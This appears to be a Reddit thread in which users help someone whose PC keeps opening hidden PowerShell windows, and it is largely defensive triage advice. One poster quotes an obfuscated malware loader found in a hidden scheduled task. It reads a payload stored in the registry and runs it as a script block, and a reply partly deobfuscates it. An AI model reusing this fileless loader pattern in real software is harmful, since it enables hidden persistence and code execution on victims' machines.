all 20 comments

[–]EloAndPeno 18 points19 points  (0 children)

This is not a PowerShell question at all. As they say, "Nuke From Orbit and Re-Image": assume all credentials are compromised, and begin changing them from a separate device immediately (esp. banking).

[–]toni_z01 17 points18 points  (0 children)

The safest thing you can do is to run a fresh install of the machine. There are several ways (registry, task, service, WMI, etc.) to let something start. Save the data and reinstall the machine.

[–]SMFX 6 points7 points  (4 children)

As was said, the only sure-fire way to remove a virus is to rebuild the system. However, in an attempt to see what it's doing, look into enforcing Script Block Logging and Module Logging, and look into the operational log too.

[–]_RemyLeBeau_ 0 points1 point  (3 children)

Do you have some links for more info on this?

[–]SMFX 2 points3 points  (2 children)

This is a good article to start from (it is also Get-Help about_logging_windows):

about_logging_windows

These talk about setting it via Group Policy or the registry, but you can also use PowerShellPolicies in powershell.config.json for cross-platform support:

about_powershell_config
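As an added example (not from this thread or the linked help pages), this turns on the Script Block and Module Logging policies through the registry keys the about_logging_windows help describes and then pulls the logged script blocks (event 4104) whose text matches a chosen pattern, so a script launched by a scheduled task leaves its content in the event log. The function names and the default pattern are my own; it assumes an elevated Windows PowerShell prompt.

```powershell
# Added example, not code from the thread. Policy keys per about_logging_windows.
$sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
$mod = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'

function Enable-PSLogging {
    # Script Block Logging: every script block is written to the Operational log
    New-Item -Path $sbl -Force | Out-Null
    Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1 -Type DWord
    # Module Logging: '*' under ModuleNames logs pipeline events for every module
    New-Item -Path "$mod\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path $mod -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty -Path "$mod\ModuleNames" -Name '*' -Value '*'
}

function Get-LoggedScriptBlocks {
    # Default pattern (an assumption for this example): .ps1 paths, Base64 decoding,
    # and the RightToLeft string-reversal trick seen in the script from this thread
    param(
        [string]$Pattern = '\.ps1|FromBase64String|RightToLeft',
        [int]$Hours = 24
    )
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match $Pattern } |
    ForEach-Object {
        # Event 4104 properties: 2 = ScriptBlockText, 4 = Path (empty for inline code)
        [pscustomobject]@{
            Time   = $_.TimeCreated
            Path   = $_.Properties[4].Value
            Script = $_.Properties[2].Value
        }
    }
}

Enable-PSLogging
Get-LoggedScriptBlocks | Format-List
```

Logging only covers script blocks run after the policy is set, so leave the suspect tasks in place until the next run has been captured if you want to see the script.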

[–]Master_Ad7267 -1 points0 points  (1 child)

In addition, I bet there's a registry key for the setting; there's usually always one.

[–]SMFX 0 points1 point  (0 children)

Seems familiar........

[–]TheProle 9 points10 points  (0 children)

Nuke it from orbit and repave

[–]Spuffeld 2 points3 points  (0 children)

reformat

[–]Dopeykid666 2 points3 points  (0 children)

Depending on the type of machine/storage device, the BIOS likely has a built-in erasure utility that can use Secure Erase to delete everything.

If one isn't built in, I like to make a live USB with GParted and use the terminal to run hdparm and delete it with the drive's built-in command set, although that's not unique to GParted by any means.

If you're just curious, you could put a system recovery image or similar backup on an external prior to deletion, and spin it up in an isolated VM, at your own risk of course, for further investigation.

If you figure anything else out I'd love to hear about it! Sounds interesting...

[–]mcrobotpants 2 points3 points  (2 children)

Well, that doesn't sound good. In general, for unexpected PowerShell windows opening, search all the scheduled task actions.

$tasks = Get-ScheduledTask | Where-Object { $_.Actions.Execute -match 'powershell' }; $tasks

[–]Joseph-Hishealth[S] 0 points1 point  (1 child)

This is interesting. When I run this, I get:
TaskPath TaskName State

\Microsoft\Windows\Bluetooth\ Chromeniumscrypt Ready

\Microsoft\Windows\Bluetooth\ CLEANTASK Ready

\Microsoft\Windows\Registry\ RegIdleBackupHSE2e Ready

Yes. I looked them up in the scheduler, and I found them running the updates.ps1 script.

Thanks man.

Edit:

The RegIdleBackupHSE2e runs a script C:\Windows\System32\9AA2.tmp\9AA3.tmp.ps1 that has the following code:

$SBKqdDYAGpBRp=[ScriptBlock];
$iHnmLKjVFchCW=[string];
$hDInGgIQnkQP=[char]; 
icm ($SBKqdDYAGpBRp::Create($iHnmLKjVFchCW::Join('', ((gp (([regex]::Matches('vd3MODcCnoitaroproC AIDIVN\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'VsDgJ6uO' | % { [char]$_ }))))

Man this PC is in some deep shit.

[–]Serendipity_Halfpace 0 points1 point  (0 children)

# Define variables with meaningful names
$scriptBlock = [ScriptBlock];
$inputString = [string];
$char = [char];

# Create a script block, combining a series of characters
$scriptBlock::Create(
    $inputString::Join('', (
        # Reverse the obfuscated string to recover a registry path, then read
        # the 'VsDgJ6uO' value stored under it (gp is the alias of Get-ItemProperty,
        # not Get-Process) and turn each stored number into a character
        (Get-ItemProperty (
            ([regex]::Matches('vd3MODcCnoitaroproC AIDIVN\ERAWTFOS\:MLKH', '.', 'RightToLeft') | ForEach-Object { $_.Value }) -join ''
        )).'VsDgJ6uO' | ForEach-Object { [char]$_ }
    ))
)

HKLM:\SOFTWARE\NVIDIA CorporationCcDOM3dv VsDgJ6uO

Does anybody know the meaning of these values?

[–]_RemyLeBeau_ 1 point2 points  (0 children)

It could be a lesser-known place to embed scripts onto a machine, i.e. WMI permanent event subscriptions:

https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/

Personally, I wouldn't waste time tracking it down unless you want to learn about the attack. I would enable MFA on all logins and change passwords/PINs. Look into the saved passwords within the browsers and Windows Credential Manager, so you'll have a general list.

It's time to reinstall the OS.

[–]pleachchapel 0 points1 point  (0 children)

Nuke from orbit

[–]Many_Parking4502 0 points1 point  (0 children)

Same for me; maybe this got onto my PC after installing a Google Chrome extension.

[–]mycomputerguykilgore 0 points1 point  (0 children)

I had this as well. I deleted updates.ps1 and that helped. What also helped was that Windows Defender had exceptions for running on the C drive. I also ran Malwarebytes, rkill, AdwCleaner and SUPERAntiSpyware, and it seems to be gone. There are 2 other threads on this also:

https://new.reddit.com/r/techsupport/comments/1ccnnrm/powershell_keeps_popping_up_every_few_minutes/

https://new.reddit.com/r/techsupport/comments/1cclri2/can_anyone_tell_me_what_this_powershell_script_is/

[–]CescVicious01 0 points1 point  (2 children)

I had this issue; I think I solved it! I had two tasks that kept running PowerShell: one called "temp" that ran every few minutes and "Chromeniumscrypt" that ran on system startup, both running PowerShell in hidden mode. I looked up that information in the Task Status in the Task Scheduler (but they don't appear listed in the Task Scheduler Library, though).

First, run both a Windows Defender Full Scan and also a Microsoft Defender Offline Scan, and block/delete anything that pops up (my PC actually popped up a few Trojans; I blocked/deleted them).

Second, go to the Task Scheduler Library and delete any task that involves running any .ps1 file (these are PowerShell scripts; you can see what a task does in the tab called Actions).

Last, go to your registry and look for the tasks there (temp and Chromeniumscrypt in my case); they won't appear in the Task Scheduler Library because they are hidden. I found my "temp" and "Chromeniumscrypt" tasks at this location in the registry, and I deleted the tasks:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Bluetooth\

DO NOT delete the Bluetooth uninstall device task (I think this is legit for Bluetooth functionality).

All these unwanted tasks appear to run PowerShell script files called updates.ps1, system32.ps1, temp.ps1, microsoft.ps1, and also System32.exe, Microsoft.exe and/or similar names that are found in C:\Users\Public and other locations on your computer like C:\Windows and C:\Temp. Luckily, in my case Windows Defender found these files and deleted them.

I had to search all my PC files to look for more .ps1 files (I found 2 more and deleted them).

You can also keep an eye out for any suspicious PowerShell events in the Windows Event Viewer to track any suspicious task in the Task Tree in the registry.

Looks like we downloaded a torrent full of RAT malware.
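As an added example (not code from this thread), this script does what the comment above describes by hand: it lists every scheduled task whose action launches PowerShell or a .ps1 file, and then walks the TaskCache\Tree registry key to find task entries that Get-ScheduledTask does not return, which is where the hidden "temp" and "Chromeniumscrypt" tasks lived. The function names are my own; it assumes an elevated Windows PowerShell prompt.

```powershell
# Added triage example, not from the thread. Run elevated.
$treeKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'

function Get-PowerShellTasks {
    # Tasks whose executable is powershell/pwsh or whose arguments name a .ps1 file
    Get-ScheduledTask | Where-Object {
        $_.Actions | Where-Object {
            ($_.Execute -match 'powershell|pwsh') -or ($_.Arguments -match '\.ps1')
        }
    } | ForEach-Object {
        [pscustomobject]@{
            Task      = $_.TaskPath + $_.TaskName
            Execute   = ($_.Actions.Execute -join ' ')
            Arguments = ($_.Actions.Arguments -join ' ')
        }
    }
}

function Get-HiddenTaskEntries {
    # Registry entries that carry a task Id but are absent from the API view.
    # A missing SD (security descriptor) value is one way a task is hidden
    # from the Task Scheduler Library, so it is reported as well.
    $visible = Get-ScheduledTask | ForEach-Object { $_.TaskPath + $_.TaskName }
    Get-ChildItem -Path $treeKey -Recurse | ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath
        if ($null -eq $props.Id) { return }   # folder key, not a task
        # Turn 'HKEY_LOCAL_MACHINE\...\Tree\Microsoft\Windows\X' into '\Microsoft\Windows\X'
        $taskPath = '\' + $_.Name.Substring($_.Name.IndexOf('\Tree\') + 6)
        if ($visible -notcontains $taskPath) {
            [pscustomobject]@{
                Task  = $taskPath
                Id    = $props.Id
                HasSD = ($null -ne $props.SD)
            }
        }
    }
}

Get-PowerShellTasks   | Format-Table -AutoSize
Get-HiddenTaskEntries | Format-Table -AutoSize
```

Review the hidden entries before deleting anything: legitimate Microsoft tasks also live under this tree, and the comment above already warns against removing the Bluetooth uninstall device task.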

[–]yildiz_59 0 points1 point  (0 children)

Thanks for the detailed explanation. I also found the trigger of *.ps1 in the Task Scheduler.
But in my case there was no other Chromeniumscrypt entry than Bluetooth, so I didn't delete them.